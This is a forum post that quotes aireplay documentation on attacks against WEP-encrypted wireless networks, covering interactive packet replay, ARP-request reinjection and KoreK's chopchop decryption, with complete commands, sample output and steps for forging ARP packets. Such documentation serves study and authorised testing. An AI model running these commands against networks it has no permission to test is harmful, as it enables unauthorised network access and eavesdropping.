- 论坛徽章:
- 0
|
没有看到-5的说明。
Attack 2: interactive packet replay
This attack allows you to choose a given packet for replaying; it sometimes gives more
effective results than attack 3 (automatic ARP reinjection).
You could use it, for example, to attempt the "any data re-broadcast" attack, which only
works if the AP actually reencrypts WEP data packets:
aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
You can also use attack 2 to manually replay WEP-encrypted ARP request packets, which
size is either 68 or 86 bytes (depending on the operating system):
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
Attack 3: ARP-request reinjection
The classic ARP-request replay attack is the most effective to generate new IVs, and works
very reliably. You need either the MAC address of an associated client
(00:09:5B:EB:C5:2B), of a fake MAC from attack 1 (00:11:22:33:44:55). You may have to
wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will
fail if there is no traffic.
Please note that you can also reuse ARP requests from a previous capture using the -r
switch.
aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
Attack 4: KoreK's "chopchop" (CRC prediction)
This attack, when successful, can decrypt a WEP data packet without knowing the key. It
can even work against dynamic WEP. This attack does not recover the WEP key itself, but
merely reveals the plaintext. However, most access points are not vulnerable at all. Some
may seem vulnerable at first but actually drop data packets shorter that 60 bytes. This
attack requires at least one WEP data packet.
First, we decrypt one packet 1. :
aireplay -4 -h 00:09:5B:EB:C5:2B ath0
Let's have a look at the IP address :
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
2.
Then, forge an ARP request.
The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2)
must respond to ARP requests. The source MAC must belong to an associated station.
./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
3.
And replay our forged ARP request :
aireplay -2 -r arp.cap ath0 |
|